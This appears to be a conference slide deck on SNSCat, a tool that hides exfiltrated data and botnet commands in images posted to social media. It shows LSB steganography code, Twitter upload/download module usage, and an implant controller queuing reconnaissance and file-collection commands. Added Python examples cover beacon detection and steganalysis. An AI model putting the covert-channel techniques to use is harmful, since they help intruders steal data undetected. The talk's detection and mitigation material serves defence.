Topics Covered



What is SNSCat 


Why SNSCat Matters 
Module Overview & Demo 
Mitigation Strategies 
"Post penetration covert channel tool designed to hide communication over social media sites and confuse incident responders"














Did you miss a key detail... 

SNSCat exploits both the technology and incident responder 















You said post penetration...isn't the access assumption a cheat? 

Cobalt & Armitage are amazing projects that can leverage our project 
(Check it out at http://www.advancedpentest.com) 
Naive Exfiltration





Weaknesses 

• Looks suspicious 

• Newer technology looks for this type of exfiltration 

• Network security infrastructure can log session 

• Attacker gives away IP 
SNSCat Exfiltration






Weaknesses Exploited 

• Data Loss Prevention vs encrypted/stego'd data 

• Security infrastructure logs valid social media site traffic 

• Attacker never sees victim 

• Incident responders won't want to touch this 

• "More of a compliance issue" attitude 
Information Security Paradigm

What happens when Knowledge is Removed?

Knowledge



• Starts by identifying an artifact of the attacker

Signature

Response

Prevention

- Clues the system has been compromised
- Connection data (IP, DNS, time, duration, count)
- Unknown traffic that is "very unusual..."

• Develop mechanism to detect footprint
• Search enterprise, mitigate discoveries
• Release methods to prevent reoccurrence
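The slide lists connection data (IP, DNS, time, duration, count) as the clue a responder starts from. The example below is added here and is not SNSCat code or a tool from the talk: it runs over a small, constructed proxy log in a made-up "timestamp source method host path bytes" layout (host names and addresses are placeholders) and flags a client whose uploads to one site arrive on a fixed interval, the footprint an automated agent with an update timer leaves even though every single request is valid social media traffic.

```python
"""Upload-cadence check over proxy logs (added example, constructed data).

Groups POST requests by (client, destination host), measures the spread of
their inter-arrival times and flags pairs whose uploads are nearly periodic.
"""
import re
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed log lines in a made-up "<ts> <src> <method> <host> <path> <bytes>"
# layout. 10.0.0.5 posts every minute (an agent on a fixed update interval);
# 10.0.0.7 posts at irregular, human-looking times to the same site.
SAMPLE_LOG = """\
2024-05-01T09:00:00 10.0.0.5 POST upload.social.example /upload 204811
2024-05-01T09:00:10 10.0.0.7 POST upload.social.example /upload 88012
2024-05-01T09:00:31 10.0.0.7 GET  www.social.example /home 5120
2024-05-01T09:01:00 10.0.0.5 POST upload.social.example /upload 204790
2024-05-01T09:02:01 10.0.0.5 POST upload.social.example /upload 204802
2024-05-01T09:03:00 10.0.0.5 POST upload.social.example /upload 204815
2024-05-01T09:04:00 10.0.0.5 POST upload.social.example /upload 204799
2024-05-01T09:05:01 10.0.0.5 POST upload.social.example /upload 204808
2024-05-01T09:07:45 10.0.0.7 POST upload.social.example /upload 1200331
2024-05-01T09:09:02 10.0.0.7 POST upload.social.example /upload 640022
2024-05-01T09:31:20 10.0.0.7 POST upload.social.example /upload 91000
2024-05-01T09:40:00 10.0.0.7 POST upload.social.example /upload 402100
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<src>\S+)\s+(?P<method>[A-Z]+)\s+"
    r"(?P<host>\S+)\s+(?P<path>\S+)\s+(?P<size>\d+)$"
)


def parse_log(text):
    """Parse lines into dicts; malformed lines are skipped, not fatal."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        row = m.groupdict()
        row["ts"] = datetime.fromisoformat(row["ts"])
        row["size"] = int(row["size"])
        rows.append(row)
    return rows


def upload_cadence(rows, min_posts=4):
    """Per (src, host) with at least min_posts POSTs: count, mean gap in
    seconds and coefficient of variation (stdev / mean) of the gaps."""
    stamps_by_pair = defaultdict(list)
    for r in rows:
        if r["method"] == "POST":
            stamps_by_pair[(r["src"], r["host"])].append(r["ts"])
    result = {}
    for pair, stamps in stamps_by_pair.items():
        if len(stamps) < min_posts:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        if len(gaps) < 2:          # stdev needs at least two gaps
            continue
        mean = statistics.mean(gaps)
        cv = statistics.stdev(gaps) / mean if mean > 0 else float("inf")
        result[pair] = {"posts": len(stamps), "mean_gap_s": mean, "cv": cv}
    return result


def find_beacons(rows, max_cv=0.1, min_posts=4):
    """(src, host) pairs whose upload timing is regular enough to look
    machine-driven. max_cv is a starting threshold, not a tuned one."""
    cadence = upload_cadence(rows, min_posts)
    return sorted(pair for pair, s in cadence.items() if s["cv"] <= max_cv)


if __name__ == "__main__":
    rows = parse_log(SAMPLE_LOG)
    for pair, s in upload_cadence(rows).items():
        print(pair, s)
    print("beacon candidates:", find_beacons(rows))
```

On the constructed data the agent host comes out with a mean gap of about 60 s and a coefficient of variation near 0.01, while the human user's gaps vary by nearly 90 % of their mean. The check only sees timing, so an agent that randomises its interval widely, or that polls far less often than the log window covers, will not stand out; pairing it with the other clues on the slide (count per day, upload size, which accounts are touched) is what makes it useful.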
Covert Channels via Stego & Crypto

Covert Channel
- Protocol abuse
- Storage or timing based

Steganography = art of hiding data in a carrier (images)
- Pretty much anywhere data can fit

Cryptography
- Plaintext, encrypted text
Graphical Overview

GUI/CLI Demo

Modules & Concepts
mbprols-MacBook-Pro:snscat2 mbprol$ java -jar XOrCrypto.jar
Usage: XOr.jar
    -e <filepath> <keypath> [output file]
    -eS <message byte values> <key>
    -d <filepath> <keypath> [output file]
    -dS <cipherText byte values> <key>
    -g <Key Byte Size> [output file]
    -gS <Key Byte Size>
mbprols-MacBook-Pro:snscat2 mbprol$
mbprols-MacBook-Pro:snscat2 mbprol$ java -jar XOrCrypto.jar -g 10 secretkey
mbprols-MacBook-Pro:snscat2 mbprol$ hexdump secretkey
0000000 e6 ff 36 b3 d4 8f 18 c2 9d d7
000000a
Q: How do you deal with compression?

A: It depends!
Social API Module

mbprols-MacBook-Pro:snscat2 mbprol$ java -jar TwitterAPI.jar -h
Usage: twitter.jar
    -upload <username> <password> <file path> <status msg>
    -downloadall <username> <download path>
    -downloadnew <username> <download path>
    -getallfilenames <username>
    -getnewfilenames <username>
    -reinventory <image link> <download path> <Twitter Handle>
    -new <filename> <username>
mbprols-MacBook-Pro:snscat2 mbprol$




Social API Module

mbprols-MacBook-Pro:snscat2 mbprol$ java -jar TwitterAPI.jar -downloadall NatureL0verl21 ./
mbprols-MacBook-Pro:snscat2 mbprol$ ls
483068539.jpg  485242079.jpg  490285734.png  490286035.png
483068564.jpg  485242185.jpg  490285799.png  501713039.png
485092307.jpg  485245500.jpg  490285855.png  501713119.png
485234569.jpg  485257662.jpg  490285906.png  NatureL0verl21.txt
485234670.jpg  489309766.jpg  490285992.png  TwitterAPI.jar
Social API Module

mbprols-MacBook-Pro:snscat2 mbprol$
501713119.png
501713039.png
490286035.png
490285992.png
490285906.png
490285855.png
490285799.png
490285734.png
489309766.jpg
485257662.jpg
485245500.jpg
485242185.jpg
485242079.jpg
485234670.jpg
485234569.jpg
485092307.jpg
483068564.jpg
483068539.jpg
mbprols-MacBook-Pro:snscat2 mbprol$ cat NatureL0verl21.txt
mbprols-MacBook-Pro:snscat2 mbprol$




Automating SNSCat

Agent

Botnet Functionality

Basics:
- Controller
- Dropper/Agent
- Communication Protocol

Fully Modular
- Downloader, Uploader, Parser modules
- Establish connected agents
- Exchange commands, view updates
Forensics?

Mitigation Strategies

Accept that network-based Data Loss Prevention has limits
Separate non-critical assets from critical assets
Move beyond the boundary
Image Compression/Alteration
• Alg behind LSB
  • Convert source data to bytes
      data[] = convertSourceToBytes();
  • Determine indices to place each bit
  • Populate embed location
      embedSize = sizeof(source data bytes) * 8;
      indexLoc[] = new int[embedSize];
      locations[] = populateLocations(indexLoc, carrierFileSize);
  • Embed, re-compose, upload
Hidden Slides (Backup)

Hidden Slide (Embed Bits)

Embed Bits (slide pseudocode, corrected so it compiles as Java: embedData is the source data as bytes, locations[] holds the carrier indices chosen by populateLocations, carrier is the carrier image's bytes)

    int position = 0;
    for (int i = 0; i < embedData.length; i++) {
        byte currByte = embedData[i];
        // split the byte into its 8 bits: arr[0] = MSB ... arr[7] = LSB
        int[] arr = new int[8];
        for (int b = 0; b < 8; b++) {
            arr[b] = (currByte >>> (7 - b)) & 1;
        }
        for (int j = 0; j < 8; j++) {
            int indexToMod = locations[position++];                           // next carrier byte to touch
            byte carrierByteToMod = carrier[indexToMod];
            byte carrierByte_LSB_Cleared = (byte) (carrierByteToMod & 0xFE);  // clear the LSB
            byte newByte_LSB = (byte) (carrierByte_LSB_Cleared | arr[j]);     // write one payload bit
            carrier[indexToMod] = newByte_LSB;
        }
    }

• Extraction: populate locations > extract bits > shift bits > save byte 

• Re-Composing: carrier image > fragment > compress > Source Data 
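The backup slides give the embed and extract steps, and the mitigation list names image compression/alteration as a countermeasure. The example below is added here and is not SNSCat code: it puts the slide's embed loop (clear the LSB with 0xFE, OR in a bit) and its extraction path into Python over a constructed byte array standing in for image samples, then shows the two things a responder cares about. First, the Westfeld/Pfitzmann pairs-of-values chi-square test, which catches sequential LSB embedding because a random-looking payload evens out the counts of each value pair (2k, 2k+1) that real image data leaves uneven. Second, that rewriting every LSB (the effect lossy re-compression or deliberate alteration has on a real image) destroys the payload while changing each sample by at most 1. The carrier statistics, seeds and thresholds are constructed for the demo.

```python
"""LSB embedding, pairs-of-values steganalysis and LSB scrubbing.
Added example (not SNSCat's code); the carrier is a constructed byte
array, not a real image."""
import random


def make_carrier(n_samples, seed=1):
    # Constructed carrier: the odd member of each value pair is rare (20 %),
    # a crude stand-in for the uneven histogram of natural image samples.
    rng = random.Random(seed)
    out = bytearray()
    for _ in range(n_samples):
        k = rng.randrange(128)                      # value pair (2k, 2k+1)
        odd = 1 if rng.random() < 0.2 else 0
        out.append(2 * k + odd)
    return out


def embed_lsb(carrier, payload):
    # Sequential form of the slide's loop: clear the LSB with 0xFE and OR in
    # one payload bit per carrier byte, MSB of each payload byte first.
    out = bytearray(carrier)
    if len(payload) * 8 > len(out):
        raise ValueError("payload does not fit in carrier")
    pos = 0
    for byte in payload:
        for j in range(8):
            out[pos] = (out[pos] & 0xFE) | ((byte >> (7 - j)) & 1)
            pos += 1
    return out


def extract_lsb(stego, n_bytes):
    # Extraction path from the slides: collect LSBs, shift them into bytes.
    out = bytearray()
    pos = 0
    for _ in range(n_bytes):
        val = 0
        for _ in range(8):
            val = (val << 1) | (stego[pos] & 1)
            pos += 1
        out.append(val)
    return bytes(out)


def chi_square_pov(samples):
    # Pairs-of-values statistic: under "LSBs are random" each member of a
    # pair is expected to hold half of the pair's total count.
    hist = [0] * 256
    for v in samples:
        hist[v] += 1
    stat, pairs = 0.0, 0
    for k in range(128):
        a, b = hist[2 * k], hist[2 * k + 1]
        total = a + b
        if total == 0:
            continue
        expected = total / 2.0
        stat += (a - expected) ** 2 / expected + (b - expected) ** 2 / expected
        pairs += 1
    return stat, pairs - 1                          # (statistic, degrees of freedom)


def looks_lsb_embedded(samples):
    # A chi-square variable has mean = dof, so a statistic near it means the
    # even/odd counts are as balanced as random LSBs make them; a clean
    # carrier with a skewed histogram scores far higher.
    stat, dof = chi_square_pov(samples)
    return stat < 2 * dof


def scrub_lsbs(samples, seed=99):
    # Simulated "Image Compression/Alteration": overwrite every LSB with a
    # fresh random bit. Each value moves by at most 1; the payload is gone.
    rng = random.Random(seed)
    return bytearray((v & 0xFE) | rng.getrandbits(1) for v in samples)


def run_demo(n_samples=8192, seed=1):
    carrier = make_carrier(n_samples, seed)
    rng = random.Random(seed + 1)
    payload = bytes(rng.randrange(256) for _ in range(n_samples // 8))
    stego = embed_lsb(carrier, payload)
    return {
        "roundtrip_ok": extract_lsb(stego, len(payload)) == payload,
        "clean_stat": chi_square_pov(carrier)[0],
        "stego_stat": chi_square_pov(stego)[0],
        "clean_flagged": looks_lsb_embedded(carrier),
        "stego_flagged": looks_lsb_embedded(stego),
        "scrub_kills_payload": extract_lsb(scrub_lsbs(stego), len(payload)) != payload,
    }


if __name__ == "__main__":
    for name, value in run_demo().items():
        print(f"{name}: {value}")
```

Two caveats for anyone using the statistic on real images: it only measures the region it is run over, so a payload embedded sequentially into the first part of a carrier is found by sliding the test along the sample stream rather than scoring the whole file once; and a scrubbed image scores like an embedded one, because the test reports that the LSBs are random, not why. The scrub itself is what the mitigation slide recommends: it costs nothing visible and breaks the channel without needing to detect it.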
Controller GUI (screenshot; text recovered from the slide image)

Added Accounts: [Twitter] snscat_implant1, [Twitter] snscat_implant2, [Twitter] snscat_implant3 (Remove All Accounts)
ServerSocket: 8080 (Close / Disconnect All); Number of Connected Agents: 0
Downloader Activation Update Interval: 1 (Sec / Min / Hr); Suspend Timer / Update Timer; Import List / Export List
Number of Connected Clients: 3; Next Update at: Not Started
Send Network Command to Implants
Workspace folders (Select Folder):
  F:\Blackhat\FINAL\StegoMaker Workspace\Download
  F:\Blackhat\FINAL\StegoMaker Workspace\Client Registration
  F:\Blackhat\FINAL\StegoMaker Workspace\Acct Sync
  F:\Blackhat\FINAL\StegoMaker Workspace\Parse
  F:\Blackhat\FINAL\StegoMaker Workspace\Connection Data
Connectivity Status: Drop Box Info: Complete; External Modules: Complete; Socket Connection: Open; Update Interval: Established; Downloader Module: Connected; Uploader Module: Connected; Parser Module: Connected
Commands: None Selected
Command composer GUI (screenshot; text recovered from the slide image)

Broadcast Account: snscatBroadcast; Broadcast PW: 123456; Acct Type: Twitter.com
Carrier Image (path truncated in the screenshot): joMakerWorkspace\JARs\Upload\CanvasFiles.png; Tag: Awesome Day Friday
Queued commands (Add Command / Remove / Remove All), each with Response: Implant Account
  Cmd 0, Parameters: systeminfo
  Cmd 0, Parameters: dir /sc:/
  Cmd 2, Parameters: c:\Special Documents\*
Carrier Size: 0 B; Command(s) Size: 0 B
Command Recipients: Broadcast Account, [Twitter] snscat_implant1, [Twitter] snscat_implant2, [Twitter] snscat_implant3
Network Traffic; Send Network Command to Implants
Commands: None Selected
Upcoming Features

PKI to validate that commands are only sent from the Controller
Larger dispersal (Twitter, Facebook, YouTube)
Embed stego in audio and video files
Exchange large file types
Explore smartphone platforms
Hidden Slides (Importing Modules)

• Building Modules
  • GUI/CLI conventions
  • Not really any specifics
  • The sky is the limit

Hidden Slides (Modules)
Crypto Module Conventions

• -e <filename> <keyfile> -- encrypts file with key
• -d <filename> <keyfile> -- decrypts file with key
• -g -- generates key(s) and stores them in TMP
• -h -- help
Hidden Slides (Additional Modules)

• Depends on what the audience would like to